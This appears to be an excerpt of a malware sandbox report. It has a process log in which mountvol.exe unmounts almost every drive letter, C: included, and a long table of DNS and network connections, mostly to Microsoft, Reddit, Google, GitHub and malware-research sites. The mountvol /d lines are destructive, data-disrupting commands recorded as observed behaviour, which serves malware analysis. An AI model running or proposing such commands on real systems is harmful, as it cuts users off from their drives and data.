C:\Windows\SYSTEM32\mountvol.exe
mountvol Q: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol R: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol S: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol A: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol T: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol B: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol U: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol D: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol V: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol E: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol W: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol F: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol X: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol G: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol Y: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol H: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol Z: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol I: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol C: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol J: /d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:80 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | s3.documentcloud.org | udp |
| US | 8.8.8.8:53 | s3.documentcloud.org | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 104.22.59.213:443 | s3.documentcloud.org | udp |
| US | 104.22.59.213:443 | s3.documentcloud.org | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 2.16.153.209:443 | copilot.microsoft.com | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| NL | 108.177.119.94:443 | update.googleapis.com | tcp |
| ES | 23.62.180.208:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| ES | 23.62.180.208:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| GB | 2.18.190.182:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 2.18.190.182:443 | assets.msn.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 150.171.27.10:443 | c.bing.com | tcp |
| GB | 2.16.153.206:443 | www.bing.com | tcp |
| GB | 2.18.190.182:443 | assets.msn.com | udp |
| IE | 13.74.129.1:443 | c.msn.com | tcp |
| GB | 2.16.153.224:443 | www.bing.com | tcp |
| NL | 18.65.39.70:443 | sb.scorecardresearch.com | tcp |
| GB | 2.19.252.154:443 | img-s-msn-com.akamaized.net | tcp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 20.44.10.123:443 | browser.events.data.msn.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| GB | 2.19.252.154:443 | img-s-msn-com.akamaized.net | udp |
| GB | 2.16.153.206:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.msftstatic.com | udp |
| US | 8.8.8.8:53 | r.msftstatic.com | udp |
| US | 204.79.197.219:443 | r.msftstatic.com | tcp |
| ES | 23.62.180.198:443 | r.bing.com | tcp |
| ES | 23.62.180.198:443 | r.bing.com | tcp |
| US | 204.79.197.219:443 | r.msftstatic.com | tcp |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| US | 150.171.22.12:443 | px.ads.linkedin.com | tcp |
| US | 8.8.8.8:53 | m.adnxs.com | udp |
| US | 8.8.8.8:53 | m.adnxs.com | udp |
| NL | 185.89.210.122:443 | m.adnxs.com | tcp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| DE | 37.252.171.53:443 | ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| ES | 23.62.180.198:443 | th.bing.com | tcp |
| ES | 23.62.180.198:443 | th.bing.com | tcp |
| ES | 23.62.180.208:443 | th.bing.com | tcp |
| ES | 23.62.180.208:443 | th.bing.com | tcp |
| ES | 23.62.180.198:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | www.reddit.com | udp |
| US | 8.8.8.8:53 | www.reddit.com | udp |
| US | 151.101.193.140:443 | www.reddit.com | tcp |
| US | 151.101.193.140:443 | www.reddit.com | tcp |
| US | 8.8.8.8:53 | www.redditstatic.com | udp |
| US | 8.8.8.8:53 | www.redditstatic.com | udp |
| US | 151.101.1.140:443 | www.redditstatic.com | tcp |
| US | 151.101.1.140:443 | www.redditstatic.com | tcp |
| US | 8.8.8.8:53 | id.rlcdn.com | udp |
| US | 8.8.8.8:53 | id.rlcdn.com | udp |
| US | 35.244.174.68:443 | id.rlcdn.com | tcp |
| US | 8.8.8.8:53 | w3-reporting.reddit.com | udp |
| US | 8.8.8.8:53 | w3-reporting.reddit.com | udp |
| US | 151.101.193.140:443 | w3-reporting.reddit.com | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.153.105:443 | www.google.com | udp |
| US | 104.22.5.65:443 | ad-delivery.net | tcp |
| BE | 142.251.173.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | preview.redd.it | udp |
| US | 8.8.8.8:53 | preview.redd.it | udp |
| US | 8.8.8.8:53 | styles.redditmedia.com | udp |
| US | 8.8.8.8:53 | styles.redditmedia.com | udp |
| US | 8.8.8.8:53 | external-preview.redd.it | udp |
| US | 8.8.8.8:53 | external-preview.redd.it | udp |
| US | 8.8.8.8:53 | appleid.cdn-apple.com | udp |
| US | 8.8.8.8:53 | appleid.cdn-apple.com | udp |
| US | 151.101.129.140:443 | external-preview.redd.it | tcp |
| US | 151.101.65.140:443 | external-preview.redd.it | tcp |
| US | 151.101.65.140:443 | external-preview.redd.it | tcp |
| US | 151.101.65.140:443 | external-preview.redd.it | tcp |
| US | 151.101.65.140:443 | external-preview.redd.it | tcp |
| US | 151.101.1.140:443 | external-preview.redd.it | tcp |
| US | 151.101.1.140:443 | external-preview.redd.it | tcp |
| GB | 23.52.176.55:443 | appleid.cdn-apple.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | alb.reddit.com | udp |
| US | 8.8.8.8:53 | alb.reddit.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | b.thumbs.redditmedia.com | udp |
| US | 8.8.8.8:53 | b.thumbs.redditmedia.com | udp |
| US | 151.101.193.140:443 | b.thumbs.redditmedia.com | tcp |
| US | 151.101.193.140:443 | b.thumbs.redditmedia.com | tcp |
| US | 151.101.193.140:443 | b.thumbs.redditmedia.com | tcp |
| US | 151.101.193.140:443 | b.thumbs.redditmedia.com | tcp |
| US | 8.8.8.8:53 | a.thumbs.redditmedia.com | udp |
| US | 151.101.193.140:443 | b.thumbs.redditmedia.com | tcp |
| US | 151.101.193.140:443 | b.thumbs.redditmedia.com | tcp |
| BE | 142.251.173.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| BE | 142.251.173.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | v.redd.it | udp |
| US | 8.8.8.8:53 | v.redd.it | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.153.99:443 | www.google.com | udp |
| US | 8.8.8.8:53 | i.redd.it | udp |
| US | 8.8.8.8:53 | i.redd.it | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | www.vx-underground.org | udp |
| US | 8.8.8.8:53 | www.vx-underground.org | udp |
| US | 104.18.7.192:443 | www.vx-underground.org | tcp |
| NL | 142.250.153.105:443 | www.google.com | udp |
| US | 104.18.7.192:443 | www.vx-underground.org | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | vx-underground.org | udp |
| US | 8.8.8.8:53 | vx-underground.org | udp |
| NL | 142.251.31.100:443 | play.google.com | tcp |
| US | 104.18.6.192:443 | vx-underground.org | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 173.194.69.94:80 | c.pki.goog | tcp |
| ES | 23.62.180.198:443 | th.bing.com | udp |
| ES | 23.62.180.208:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | rewards.bing.com | udp |
| US | 8.8.8.8:53 | rewards.bing.com | udp |
| US | 150.171.28.10:443 | rewards.bing.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 23.73.139.43:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | deff.nelreports.net | udp |
| US | 8.8.8.8:53 | deff.nelreports.net | udp |
| US | 8.8.8.8:53 | w3-reporting-nel.reddit.com | udp |
| US | 8.8.8.8:53 | w3-reporting-nel.reddit.com | udp |
| GB | 23.73.139.75:443 | deff.nelreports.net | tcp |
| BE | 142.251.173.84:443 | accounts.google.com | udp |
| US | 35.244.174.68:443 | id.rlcdn.com | udp |
| BE | 142.251.173.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| DE | 172.217.16.81:443 | csp.withgoogle.com | tcp |
| NL | 142.250.153.99:443 | www.google.com | udp |
| NL | 142.250.153.105:443 | www.google.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 204.79.197.219:443 | r.msftstatic.com | tcp |
| ES | 23.62.180.208:443 | www.bing.com | tcp |
| GB | 2.18.190.99:443 | assets.msn.com | udp |
| GB | 2.18.190.99:443 | assets.msn.com | udp |
| ES | 23.62.180.208:443 | www.bing.com | tcp |
| ES | 23.62.180.208:443 | www.bing.com | udp |
| NL | 18.65.39.56:443 | sb.scorecardresearch.com | tcp |
| US | 204.79.197.219:443 | r.msftstatic.com | tcp |
| GB | 2.18.190.99:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| DK | 84.53.172.41:443 | img-s-msn-com.akamaized.net | udp |
| NL | 142.251.31.100:443 | play.google.com | udp |
| US | 20.189.173.6:443 | browser.events.data.msn.com | tcp |
| US | 150.171.28.10:443 | c.bing.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | www.reddit.com | udp |
| US | 8.8.8.8:53 | www.reddit.com | udp |
| US | 8.8.8.8:53 | www.redditstatic.com | udp |
| US | 8.8.8.8:53 | www.redditstatic.com | udp |
| US | 8.8.8.8:53 | styles.redditmedia.com | udp |
| US | 8.8.8.8:53 | styles.redditmedia.com | udp |
| US | 8.8.8.8:53 | alb.reddit.com | udp |
| US | 8.8.8.8:53 | alb.reddit.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | w3-reporting.reddit.com | udp |
| US | 8.8.8.8:53 | w3-reporting.reddit.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | a.thumbs.redditmedia.com | udp |
| US | 8.8.8.8:53 | a.thumbs.redditmedia.com | udp |
| US | 8.8.8.8:53 | b.thumbs.redditmedia.com | udp |
| US | 8.8.8.8:53 | b.thumbs.redditmedia.com | udp |
| US | 8.8.8.8:53 | avcaesar.malware.lu | udp |
| US | 8.8.8.8:53 | avcaesar.malware.lu | udp |
| LU | 213.167.245.235:443 | avcaesar.malware.lu | tcp |
| LU | 213.167.245.235:443 | avcaesar.malware.lu | tcp |
| LU | 213.167.245.235:443 | avcaesar.malware.lu | tcp |
| LU | 213.167.245.235:443 | avcaesar.malware.lu | tcp |
| LU | 213.167.245.235:443 | avcaesar.malware.lu | tcp |
| US | 8.8.8.8:53 | malware.lu | udp |
| US | 8.8.8.8:53 | malware.lu | udp |
| LU | 213.167.245.235:443 | malware.lu | tcp |
| LU | 213.167.245.235:443 | malware.lu | tcp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 2.18.27.76:443 | www.bing.com | udp |
| BE | 142.251.173.84:443 | accounts.google.com | udp |
| GB | 23.73.139.75:443 | deff.nelreports.net | tcp |
| US | 8.8.8.8:53 | w3-reporting-nel.reddit.com | udp |
| US | 8.8.8.8:53 | w3-reporting-nel.reddit.com | udp |
| US | 8.8.8.8:53 | deff.nelreports.net | udp |
| US | 8.8.8.8:53 | deff.nelreports.net | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | id.rlcdn.com | udp |
| US | 8.8.8.8:53 | id.rlcdn.com | udp |
| US | 35.244.174.68:443 | id.rlcdn.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| BE | 142.251.173.84:443 | accounts.google.com | udp |
| NL | 142.250.153.99:443 | www.google.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | external-preview.redd.it | udp |
| US | 8.8.8.8:53 | external-preview.redd.it | udp |
| US | 8.8.8.8:53 | v.redd.it | udp |
| US | 8.8.8.8:53 | v.redd.it | udp |
| NL | 142.250.153.105:443 | www.google.com | udp |
| US | 8.8.8.8:53 | nleditor.osi.office.net | udp |
| NL | 52.111.243.42:443 | nleditor.osi.office.net | tcp |
| US | 8.8.8.8:53 | www.reddit.com | udp |
| US | 8.8.8.8:53 | www.reddit.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.31.113:443 | play.google.com | udp |
| US | 8.8.8.8:53 | www.redditstatic.com | udp |
| US | 8.8.8.8:53 | www.redditstatic.com | udp |
| US | 8.8.8.8:53 | i.redd.it | udp |
| US | 8.8.8.8:53 | i.redd.it | udp |
| US | 8.8.8.8:53 | styles.redditmedia.com | udp |
| US | 8.8.8.8:53 | styles.redditmedia.com | udp |
| US | 8.8.8.8:53 | alb.reddit.com | udp |
| US | 8.8.8.8:53 | alb.reddit.com | udp |
| US | 8.8.8.8:53 | w3-reporting.reddit.com | udp |
| US | 8.8.8.8:53 | w3-reporting.reddit.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge-http.microsoft.com | udp |
| US | 8.8.8.8:53 | edge-http.microsoft.com | udp |
| US | 150.171.73.11:80 | edge-http.microsoft.com | tcp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| DE | 172.217.16.81:443 | csp.withgoogle.com | udp |
| US | 8.8.8.8:53 | preview.redd.it | udp |
| US | 8.8.8.8:53 | preview.redd.it | udp |
| US | 8.8.8.8:53 | a.thumbs.redditmedia.com | udp |
| US | 8.8.8.8:53 | a.thumbs.redditmedia.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| ES | 23.62.180.198:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| DK | 84.53.172.107:443 | assets.msn.com | udp |
| DK | 84.53.172.107:443 | assets.msn.com | udp |
| ES | 23.62.180.208:443 | www.bing.com | udp |
| DK | 84.53.172.64:443 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| ES | 23.62.180.198:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | b.thumbs.redditmedia.com | udp |
| US | 8.8.8.8:53 | b.thumbs.redditmedia.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| BE | 142.251.173.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | www.reddit.com | udp |
| US | 8.8.8.8:53 | www.reddit.com | udp |
| US | 8.8.8.8:53 | alb.reddit.com | udp |
| US | 8.8.8.8:53 | alb.reddit.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | w3-reporting.reddit.com | udp |
| US | 8.8.8.8:53 | w3-reporting.reddit.com | udp |
| GB | 2.18.27.82:443 | th.bing.com | udp |
| ES | 23.62.180.208:443 | r.bing.com | udp |
| GB | 2.18.27.82:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| GB | 2.18.27.76:443 | www.bing.com | udp |
| US | 185.199.109.133:443 | user-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | deff.nelreports.net | udp |
| US | 8.8.8.8:53 | deff.nelreports.net | udp |
| US | 8.8.8.8:53 | w3-reporting-nel.reddit.com | udp |
| US | 8.8.8.8:53 | w3-reporting-nel.reddit.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 2.19.252.134:443 | aefd.nelreports.net | tcp |
| GB | 2.18.190.163:443 | deff.nelreports.net | tcp |
| GB | 2.19.252.134:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | view.officeapps.live.com | udp |
| US | 8.8.8.8:53 | view.officeapps.live.com | udp |
| US | 52.108.8.12:443 | view.officeapps.live.com | tcp |
| US | 52.108.8.12:443 | view.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | pie1-excel.officeapps.live.com | udp |
| US | 8.8.8.8:53 | res-1.cdn.office.net | udp |
| US | 8.8.8.8:53 | res-1.cdn.office.net | udp |
| US | 52.108.9.12:443 | view.officeapps.live.com | tcp |
| GB | 2.18.190.164:443 | res-1.cdn.office.net | tcp |
| GB | 2.18.190.164:443 | res-1.cdn.office.net | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| GB | 2.18.190.164:443 | res-1.cdn.office.net | udp |
| GB | 2.18.190.164:443 | res-1.cdn.office.net | udp |
| US | 8.8.8.8:53 | euc-excel-telemetry.officeapps.live.com | udp |
| US | 8.8.8.8:53 | euc-excel-telemetry.officeapps.live.com | udp |
| NL | 52.108.24.3:443 | euc-excel-telemetry.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | oauth.officeapps.live.com | udp |
| US | 8.8.8.8:53 | oauth.officeapps.live.com | udp |
| US | 52.108.9.12:443 | oauth.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | wise.public.cdn.office.net | udp |
| US | 8.8.8.8:53 | wise.public.cdn.office.net | udp |
| US | 8.8.8.8:53 | eu-office.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | eu-office.events.data.microsoft.com | udp |
